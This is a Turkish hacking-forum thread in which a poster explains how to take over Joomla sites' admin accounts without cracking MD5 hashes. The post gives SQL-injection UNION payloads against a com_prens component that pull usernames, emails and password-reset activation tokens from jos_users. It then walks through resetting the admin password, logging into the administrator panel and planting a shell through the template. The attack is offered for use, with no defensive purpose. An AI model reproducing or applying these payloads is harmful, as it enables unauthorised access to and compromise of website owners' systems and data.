İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

joomla md5 kırma son

07-04-2010 14:24
#1
brhn34 - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
07/2009
Mesajlar:
1.272
Teşekkür (Etti):
32
Teşekkür (Aldı):
81
Konular:
164
Ticaret:
(0) %
S.a beyler Bugun Sizlere Farklı bi konu anlatacam aslında güzel bişe anlatmasam mı diye çok düşündüm ama anlatım dedim nede olsa ülkemiz heykır çıkarma konusunda 1 numara başlayalım konumuz joomla

Şimdi joomla sitelerde sql bulunur ama genelde herkes md5 i kırmaya çalışır öyle admin panele girmek ister biz md5 kırmayacaz aslında oldukça eski bir yöntem kullandığım fakat daha bilmeyen okadar insan varki anlatalım



Site.com/index.php?option=com_prens&catid=2+and+1=0+union+s elect+0,1,2,group_concat(username, 0x3a,password),4,5+from+jos_users--



Şeklindeki bir sql sorgusunda bize username ve password verir bizde md5 kırmaya çalışırız aslında hiç gerek yok
şimdi biz şunu yapacaz



Site.com/index.php?option=com_prens&catid=2+and+1=0+union+s elect+0,1,2,group_concat(username, 0x3a,email),4,5+from+jos_users--



SQL sorgusunda biz password yerine email yazıyoruz karşımıza şöle bişe geldi vazsayalım

Prens : prens@megaturks.net

şimdi username , email geldi napacaz sitemize şu komutu girelim



site.com/index.php?option=com_user&view=reset

şeklinde girdiğimizde karşımıza parola sıfırlama ekranı çıktı üstteki email i yazıyoruz ve karşımıza token gelir
şimdi oraya napacaz üstteki sql sorgumuzda bi komut yazarak token i alalım

Site.com/index.php?option=com_prens&catid=2+and+1=0+union+s elect+0,1,2,group_concat(username, 0x3a,activation),4,5+from+jos_users--



activation = yazarak activation kodunu alıyoruz ve token yazan yere yapıştırıp ileri diyoruz ve sürpüzzz karşımıza parola sıfırlama ekranı geldi istediğimiz bir parolayı yaparız kendimize göre username zaten biliyoruz

Site.com/administrator yapıyoruz user pass giriyoruz hoop paneldeyiz

temlpateden shell soka bilirsiniz.

alıntıdır

06-12-2012 19:53
#2
janberkb - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2012
Mesajlar:
13
Teşekkür (Etti):
7
Teşekkür (Aldı):
0
Konular:
1
Ticaret:
(0) %
usta hangi siteye denediysem hepsi 404 error veriyo

OltreLuce - Vendita lampadari online


istersen sen de dene

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı